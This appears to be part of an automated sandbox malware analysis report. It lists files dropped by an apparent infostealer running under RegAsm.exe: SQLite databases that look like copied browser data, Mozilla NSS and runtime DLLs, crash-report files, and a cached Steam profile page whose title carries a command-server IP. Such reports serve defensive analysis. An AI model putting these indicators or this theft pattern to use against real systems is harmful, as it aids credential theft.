C:\ProgramData\ECAEGHIJEHJDHIDHIDAE

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\GCAFCAFH

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136471148832945
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
MD5:	37B1FC046E4B29468721F797A2BB968D
SHA1:	50055EF1C50E4C1A7CCF7D00620E95128E4C448B
SHA-256:	7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
SHA-512:	1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HDAFBAEBKJKFIDHJJKJKKFBAFB

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.0357803477377646
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWwJU0VnQphI1mJ/8GJK:58r54w0VW3xWB0VaI4
MD5:	76D181A334D47872CD2E37135CC83F95
SHA1:	B563370B023073CE6E0F63671AA4AF169ABBF4E1
SHA-256:	52D831CC6F56C3A25EB9238AAF25348E1C4A3D361DFE7F99DB1D37D89A0057FD
SHA-512:	23E0D43E4785E5686868D5448628718720C5A8D9328EE814CB77807260F7CDA2D01C5DEE8F58B5713F4F09319E6CB7AB24725078C01322BAE04777418A49A9F7
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HIDBFCBG

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1239949490932863
Encrypted:	false
SSDEEP:	384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
MD5:	271D5F995996735B01672CF227C81C17
SHA1:	7AEAACD66A59314D1CBF4016038D3A0A956BAF33
SHA-256:	9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
SHA-512:	62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IJEHIDHDAKJDHJKEBFIE

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8745947603342119
Encrypted:	false
SSDEEP:	96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
MD5:	378391FDB591852E472D99DC4BF837DA
SHA1:	10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
SHA-256:	513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
SHA-512:	F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KFCGDBAK

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.5394293526345721
Encrypted:	false
SSDEEP:	96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
MD5:	52701A76A821CDDBC23FB25C3FCA4968
SHA1:	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
SHA-256:	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
SHA-512:	2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_46295dc254ed0112f7af36e8d4fb4383967ee_a4c4a70a_16ba7210-c1f9-4ac0-8547-e3f2990a2e8f\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9096764057681599
Encrypted:	false
SSDEEP:	192:yTBNhvSP4Gmc0BU/b0xauszuiFnZ24IO84B:0bSnmXBU/aa1zuiFnY4IO8s
MD5:	25F05D7261977BC3D4A59E74B5FC467F
SHA1:	2E70D888CB95A6904F3C6A6496A07156C13DF6F6
SHA-256:	3226A5F572BE441F0AF0125B4F06CFF06380D278CCB6E49A6CC5493563A9D380
SHA-512:	AD642C41544704D540BB5EA498E7E79FA41B08B94EA5BAF0D24F41A918A8732C024DC707AAFD6701E6D54811A547F04B7C6DA1D22F99F53D2DEDB39C098C5C39
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.6.1.2.8.0.9.1.1.4.2.3.6.0.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.6.1.2.8.0.9.2.0.4.8.6.1.1.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.6.b.a.7.2.1.0.-.c.1.f.9.-.4.a.c.0.-.8.5.4.7.-.e.3.f.2.9.9.0.a.2.e.8.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.5.8.b.4.9.5.b.-.1.7.5.c.-.4.1.7.f.-.b.0.d.2.-.b.c.9.8.4.9.e.3.e.e.d.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.F.r.i.e.n.d.l.y...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.7.e.0.-.0.0.0.1.-.0.0.1.5.-.0.c.2.b.-.1.7.f.f.4.6.8.1.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.d.6.a.2.e.d.b.6.b.b.5.1.0.7.3.7.a.9.b.2.c.c.e.f.6.c.d.6.d.4.4.2.0.0.0.0.0.0.0.0.!.0.0.0.0.b.1.a.1.9.1.5.9.7.f.5.a.2.e.c.d.d.3.b.9.1.8.5.b.8.9.0.7.2.c.f.a.e.0.6.a.e.5.c.d.!.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3DCE.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Thu Mar 28 19:34:51 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	174970
Entropy (8bit):	3.9219695328621547
Encrypted:	false
SSDEEP:	1536:7CXpN4uE2aOB6kACDELTgR7+AlHml1tT3CSVXxyuBojRcM:7Cn4uEqB6kbELTgRi2yUc
MD5:	011660E9996CB7FC5862BDEBE867795B
SHA1:	882F0B191BF6F8D68C5576A78B037A96D14431AA
SHA-256:	8C5DFB011E8B85CD5724F4951768197A2A1DD6B2CD5A9C1A0F301B38D5EE6689
SHA-512:	AE11C0FA24663D7D9ED223760DF0082473CD4672D1E4AEC4B460D0844542D4A5BAB791D4D9655384068B58DC4CDF0DBB16131D203EF89B678749090739D3FCD0
Malicious:	false
Preview:	MDMP..a..... .......[..f....................................$...........$...$9..........`.......8...........T............$.........................................................................................................eJ......L.......GenuineIntel............T...........X..f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER405F.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8310
Entropy (8bit):	3.69864627111925
Encrypted:	false
SSDEEP:	192:R6l7wVeJvCkA643G6Y2DOSUUgmfBy4JaOxprx89bEdsfCsm:R6lXJW6QG6YTSUUgmfA4J2EWf4
MD5:	0342FFC4D0380333E0DE2211F1DE2030
SHA1:	1BBCD714700547C2A64AFFD4329C869C30EBB8E1
SHA-256:	A3BD269922A7AEC8DB3232EB51D4EDA17254E084984A42834C89B9DEC800481C
SHA-512:	11B314AA452D571D71C215F598CFCFD16B01D3885CCE3D44BD0DE3CF0A1704A179606CE718B6B7237E49ABBD30FF9E2951A15A0006F42279772F5061E2C01A03
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.0.1.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4080.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4628
Entropy (8bit):	4.457694741784821
Encrypted:	false
SSDEEP:	48:cvIwWl8zsJJg77aI974WpW8VYEYm8M4JgAFz+q84EJD7zGd:uIjfbI7Rx7VUJfqD7Cd
MD5:	52F7D04C00EA1C44807F19F9211EFDAC
SHA1:	E229E69E39E8364D15ACDA8DD108A2AB2DD0B4D1
SHA-256:	87127A5B4A21E59C328371F4EBCADE546F688FC165535C1135E51E310A118FD4
SHA-512:	99A7B29E55B1042FDFEF760FF34BEF4AC9E42DBB2077D44AC06B90AE1F85A32E8C6D4A62D83B1544CC37C63742CF1AFBBA4B17C4133269FA268E2AB3FC0D1BB5
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="255517" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: z5uPcOrP22.exe, Detection: malicious, Browse Filename: BuThoFHNNK.exe, Detection: malicious, Browse Filename: 6uVlPQSJ4e.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: i1crvbOZAP.exe, Detection: malicious, Browse Filename: yU3icg18lq.exe, Detection: malicious, Browse Filename: EcNghZJd5O.exe, Detection: malicious, Browse Filename: PIa51EkBL7.exe, Detection: malicious, Browse Filename: G2KdVscPB4.exe, Detection: malicious, Browse Filename: ofrAxT2J4j.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: z5uPcOrP22.exe, Detection: malicious, Browse Filename: BuThoFHNNK.exe, Detection: malicious, Browse Filename: 6uVlPQSJ4e.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: i1crvbOZAP.exe, Detection: malicious, Browse Filename: yU3icg18lq.exe, Detection: malicious, Browse Filename: EcNghZJd5O.exe, Detection: malicious, Browse Filename: PIa51EkBL7.exe, Detection: malicious, Browse Filename: G2KdVscPB4.exe, Detection: malicious, Browse Filename: ofrAxT2J4j.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\sqlm[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2459136
Entropy (8bit):	6.052474106868353
Encrypted:	false
SSDEEP:	49152:WHoJ9zGioiMjW2RrL9B8SSpiCH7cuez9A:WHoJBGqabRnj8JY/9
MD5:	90E744829865D57082A7F452EDC90DE5
SHA1:	833B178775F39675FA4E55EAB1032353514E1052
SHA-256:	036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
SHA-512:	0A2D112FF7CB806A74F5EC17FE097D28107BB497D6ED5AD28EA47E6795434BA903CDB49AAF97A9A99C08CD0411F1969CAD93031246DC107C26606A898E570323
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........7.Z.Y.Z.Y.Z.Y...Z.n.Y...\..Y...]...Y...X.Y.Y.Z.X..Y.O.\.E.Y.O.].U.Y.O.Z.L.Y.l3].[.Y.l3Y.[.Y.l3..[.Y.l3[.[.Y.RichZ.Y.................PE..L...i.`e...........!...%.. .........{D........ ...............................%...........@...........................#..6....$.(.....$.......................$.....`.#.8...........................x.#.@.............$..............................text...G. ....... ................. ..`.rdata...".... ..$.... .............@..@.data...4\|... $..b....#.............@....idata........$......^$.............@..@.00cfg........$......p$.............@..@.rsrc.........$......r$.............@..@.reloc..5.....$.......$.............@..B................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\76561199658817715[1].htm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (3041), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	34657
Entropy (8bit):	5.4297664398586125
Encrypted:	false
SSDEEP:	768:k7pqLtWY2wt5D0gqxAiNGAhZ4VWBCW3KI8iCfukPco1AU2Z4VWBCW3KI8iKh2S25:k78LtWY2wt5D0gqxAchZ4VWBCW3KI8iZ
MD5:	8658C7864AA23EB6807BE7A7738C7AF4
SHA1:	DD578717F9DCF61EBC65D54D7F614E44D4F9B992
SHA-256:	3B6EA3B2F6186D5A6E55CD402D648874BEA445A2D2A49EF597D6175B19C8C2E5
SHA-512:	255AAD6C6E67457C393DAADC06277C63889F8B6152E60BCA2E6375900BD3F8DFEB93041C773D288B8360834613AB8C68B4F3601EEA431BFA5CB39E6E2E03C022
Malicious:	false
Preview:	<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: fgsh https://78.46.229.36\|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&l=english&_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&l=english&_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=Zj8Lt-uyXH8R&l=english&_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/css/globalv2.css

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\freebl3[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

